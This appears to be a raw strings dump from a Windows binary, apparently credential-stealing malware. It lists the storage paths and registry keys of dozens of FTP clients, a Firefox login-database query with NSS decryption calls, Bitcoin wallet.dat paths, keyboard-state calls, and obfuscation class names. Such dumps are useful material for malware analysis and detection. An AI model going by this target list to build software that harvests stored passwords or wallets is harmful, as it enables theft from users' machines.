ftpshell.fsi
servers.xml
servers.xml
\FTPGetter
\FTPGetter
server_user_password
server_user_password
server_port
server_port
SM.arch
SM.arch
GoFTP
GoFTP
Goftp Rocks 91802sfaiolpqikeu39
Goftp Rocks 91802sfaiolpqikeu39
Connections.txt
Connections.txt
MS IE FTP Passwords
MS IE FTP Passwords
pstorec.dll
pstorec.dll
advapi32.dll
advapi32.dll
sites.dat
sites.dat
unleap.exe
unleap.exe
\LeapWare\LeapFTP
\LeapWare\LeapFTP
LeechFTP Bookmark File.
LeechFTP Bookmark File.
bookmark.dat
bookmark.dat
Software\LeechFTP
Software\LeechFTP
LeechFTP
LeechFTP
LINASFTP1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
LINASFTP1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
Software\LinasFTP\Site Manager
Software\LinasFTP\Site Manager
Mozilla
Mozilla
nss3.dll
nss3.dll
PK11_GetInternalKeySlot
PK11_GetInternalKeySlot
sqlite3_close
sqlite3_close
sqlite3_column_blob
sqlite3_column_blob
sqlite3_column_bytes
sqlite3_column_bytes
sqlite3_prepare
sqlite3_prepare
sqlite3_step
sqlite3_step
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
mozsqlite3.dll
mozsqlite3.dll
sqlite3.dll
sqlite3.dll
sqlite3_open
sqlite3_open
signons.sqlite
signons.sqlite
signons.txt
signons.txt
signons2.txt
signons2.txt
signons3.txt
signons3.txt
\profiles.ini
\profiles.ini
PathToExe
PathToExe
Mozilla\Firefox
Mozilla\Firefox
Firefox
Firefox
Software\Mozilla
Software\Mozilla
SeaMonkey
SeaMonkey
Mozilla\SeaMonkey
Mozilla\SeaMonkey
Mozilla\Profiles
Mozilla\Profiles
remote password
remote password
remote port
remote port
My FTP
My FTP
project.ini
project.ini
klfhuw%$#%fgjlvf
klfhuw%$#%fgjlvf
NDSites.ini
NDSites.ini
FTP .Link\shell\open\command
FTP .Link\shell\open\command
*.fpl
*.fpl
xxx.xiles.net
xxx.xiles.net
ftpsite.ini
ftpsite.ini
NppFTP.xml
NppFTP.xml
nppftp
nppftp
MasterPass
MasterPass
user_pass
user_pass
host_port
host_port
SQLite3
SQLite3
bmk_ftp
bmk_ftp
NovaFTP.db
NovaFTP.db
\INSoftware\NovaFTP
\INSoftware\NovaFTP
SiteInfo.QFP
SiteInfo.QFP
PortNumber
PortNumber
SOFTWARE\Robo-FTP 3.8\FTPServers
SOFTWARE\Robo-FTP 3.8\FTPServers
SOFTWARE\Robo-FTP 3.7\FTPServers
SOFTWARE\Robo-FTP 3.7\FTPServers
S:"Password"
S:"Password"
D:"Transfer Port"
D:"Transfer Port"
*.ini
*.ini
*.xml
*.xml
Msi.dll
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\SmartFTP
\SmartFTP
Favorites.dat
Favorites.dat
Software\FTPClient\Sites
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
Staff-FTP
Staff-FTP
C87BC961-AAF9-11d2-8A80-0080ADB32FF4
C87BC961-AAF9-11d2-8A80-0080ADB32FF4
sites.db
sites.db
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
\Whisper Technology\FTP Surfer
\Whisper Technology\FTP Surfer
TurboFTP@
TurboFTP@
TurboFTP@usa.net
TurboFTP@usa.net
turboPTF@
turboPTF@
Software\TurboFTP
Software\TurboFTP
\TurboFTP
\TurboFTP
addrbk.dat
addrbk.dat
quick.dat
quick.dat
PassWord
PassWord
Software\South River Technologies\WebDrive\Connections
Software\South River Technologies\WebDrive\Connections
Software\Cryer\WebSitePublisher
Software\Cryer\WebSitePublisher
WinFTP
WinFTP
your.name@your.server.com
your.name@your.server.com
FTPServers.Servers1_FTPServers
FTPServers.Servers1_FTPServers
_PassWord
_PassWord
_Port
_Port
wiseftpsrvs.bin
wiseftpsrvs.bin
wiseftpsrvs.ini
wiseftpsrvs.ini
wisePTF.ini
wisePTF.ini
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
WS_FTP
WS_FTP
\win.ini
\win.ini
Ipswitch\WS_FTP
Ipswitch\WS_FTP
Software\Ghisler\Windows Commander
Software\Ghisler\Windows Commander
\Windows Commander
\Windows Commander
\wcx_PTF.ini
\wcx_PTF.ini
FtpIniName
FtpIniName
*.xfp
*.xfp
FAR Manager FTP
FAR Manager FTP
Windows/Total Commander
Windows/Total Commander
TurboFTP
TurboFTP
WebSitePublisher
WebSitePublisher
SoftX FTP Client
SoftX FTP Client
LeapFTP
LeapFTP
32bit FTP
32bit FTP
FTP Control
FTP Control
CuteFTP
CuteFTP
FFFTP
FFFTP
Core FTP
Core FTP
WebDrive
WebDrive
Classic FTP
Classic FTP
FTP Explorer
FTP Explorer
SmartFTP
SmartFTP
FreeFTP/DirectFTP
FreeFTP/DirectFTP
FTPRush
FTPRush
FTPGetter
FTPGetter
ALFTP
ALFTP
3DFTP
3DFTP
XFTP
XFTP
TFTPInfo
TFTPInfo
MyFTP
MyFTP
NovaFTP
NovaFTP
X;
X;
%s>
%s>
%s="%s"
%s="%s"
%s='%s'
%s='%s'
version="%s"
version="%s"
encoding="%s"
encoding="%s"
standalone="%s"
standalone="%s"
crypt32.dll
crypt32.dll
%Documents and Settings%
%Documents and Settings%
\Application Data\Bitcoin\wallet.dat
\Application Data\Bitcoin\wallet.dat
C:\Users
C:\Users
\AppData\Roaming\Bitcoin\wallet.dat
\AppData\Roaming\Bitcoin\wallet.dat
GetKeyboardState
GetKeyboardState
SetKeyboardState
SetKeyboardState
KeySize
KeySize
: this object does't support a special last block
: this object does't support a special last block
NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes
NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes
: this object doesn't support multiple channels
: this object doesn't support multiple channels
is not a valid key length
is not a valid key length
InvertibleRSAFunction: computational error during private key operation
InvertibleRSAFunction: computational error during private key operation
TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
TF_SignerBase: the recoverable message part is too long for the given key and algorithm
TF_SignerBase: the recoverable message part is too long for the given key and algorithm
for this key
for this key
: this key is too short to encrypt any messages
: this key is too short to encrypt any messages
for this public key
for this public key
PK_Signer: key too short for this signature scheme
PK_Signer: key too short for this signature scheme
operation failed with error
operation failed with error
?#%X.y
?#%X.y
.?AVwindows_file_codecvt@@
.?AVwindows_file_codecvt@@
zcÃ
zcÃ
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$sp_ms_deleter@V?$connection@Vhttp_simple_client@http@net_utils@@@net_keys@@@detail@boost@@
.?AV?$sp_ms_deleter@V?$connection@Vhttp_simple_client@http@net_utils@@@net_keys@@@detail@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AVmoniker_helper@monkeys@@
.?AVmoniker_helper@monkeys@@
.?AVmonkey_swap_nibbles@monkeys@@
.?AVmonkey_swap_nibbles@monkeys@@
.?AVmonkey_xor@monkeys@@
.?AVmonkey_xor@monkeys@@
.?AVmonkey_running_xor@monkeys@@
.?AVmonkey_running_xor@monkeys@@
.?AVmonkey_swap@monkeys@@
.?AVmonkey_swap@monkeys@@
.?AVmonkey_reverse@monkeys@@
.?AVmonkey_reverse@monkeys@@
.?AVmonkey_roll_n@monkeys@@
.?AVmonkey_roll_n@monkeys@@
.?AVmonkey_bits_pack@monkeys@@
.?AVmonkey_bits_pack@monkeys@@
.?AVmonkey_wave@monkeys@@
.?AVmonkey_wave@monkeys@@
.?AV?$bind_t@_NV?$mf4@_NVhttp_simple_client@http@net_utils@@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@HII@_mfi@boost@@V?$list5@U?$arg@$00@boost@@V?$value@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@_bi@2@V?$value@H@42@V542@V542@@_bi@3@@_bi@boost@@